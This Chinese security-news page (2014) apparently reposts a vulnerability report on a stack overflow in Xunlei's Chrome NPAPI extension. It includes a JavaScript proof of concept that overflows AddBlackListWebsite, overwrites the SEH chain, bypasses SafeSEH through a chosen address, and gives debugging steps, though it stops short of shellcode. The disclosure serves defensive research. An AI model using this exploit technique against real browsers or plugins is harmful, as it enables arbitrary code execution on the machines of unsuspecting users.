首页 > 安全 > 系统安全 >

迅雷chrome插件栈溢出可导致执行任意代码

2014-08-15

迅雷是迅雷公司开发的互联网下载软件。迅雷是一款基于多资源超线程技术的下载软件 安装迅雷时,向导会建议用户安装相关浏览器扩展,其中chrome浏览器下的Thunder Download Extension for Chrome扩展(简称迅雷c

迅雷是迅雷公司开发的互联网下载软件。迅雷是一款基于多资源超线程技术的
下载软件.安装迅雷时,向导会建议用户安装相关浏览器扩展,其中chrome浏览器
下的Thunder Download Extension for Chrome扩展(简称迅雷chrome扩展)存
在栈溢出漏洞,安装了迅雷chrome扩展的用户在浏览恶意网页时,可能执行任意代码.

thanks: 金龟子测试环境:

win 2003 默认配置



查看迅雷chrome扩展manifest.json文件时,发现该扩展使用了NPAPI(Netscape

Plugin Application Programming Interface,网景插件应用程序接口)实现了xl_chrome.dll,

并且public属性为true,所以xl_chrome可以被任意网页调用.

POC:

<embed type="application/xl_chrome_plugin" id="xl_chrome_plugin">
<script>
   var plugin = document.getElementById("xl_chrome_plugin");
  
  function exploit() {
  
var i = 0;
var exploit_string = &#39;&#39;;
var nop = &#39;\x72\x00\x72\x00&#39;;  // jz next_code;
var safeseh_addr = &#39;\x0b\x0b\x27\x00&#39;; // call [ebp+30h]
var jz_seh_addr = &#39;\x74\x22\x74\x22&#39;; // skip seh

while (i < 20012) {
i += 1;
exploit_string += &#39;a&#39;;
}
exploit_string += jz_seh_addr;
exploit_string += safeseh_addr;

i = 0;
while (i < 20000) {
i += 1;
exploit_string += &#39;\x72\x00\x72\x00&#39;; // nop
}

plugin.AddBlackListWebsite(exploit_string);
  }
</script>
// 大wooyun把一个正斜杠 替换成两个正斜杠了

xl_chrome实现的AddBlackListWebsite存在栈溢出(AddBlackListPage应该也有,其他未作测试)



利用mona查看程序相关保护

需要bypass SafeSEH,查找bypass SafeSEH的地址

最后选择0x00270b0b作为跳转地址



命令行

chrome.exe --plugin-startup-dialog





Immunity Debugger 附加到chrome弹出对话框显示的进程id,chrome打开上面POC网页,F12打开console,输入exploit() (为了方便调试写成一个函数),会触发一个写异常

忘记说了,因为程序带有GS,所以只能通过覆盖SafeSEH,触发异常来进入异常处理函数,

这个时候异常链已经被我们覆盖成其中的0x00270B0B就是我们选取bypass SafeSEH的地址最后又回到了我们可控的地方

剩下的就是shellcode的问题了

修复方案:

NPAPI,google早就说要弃用了吧,为什么大迅雷还敢继续用

相关文章
最新文章
热点推荐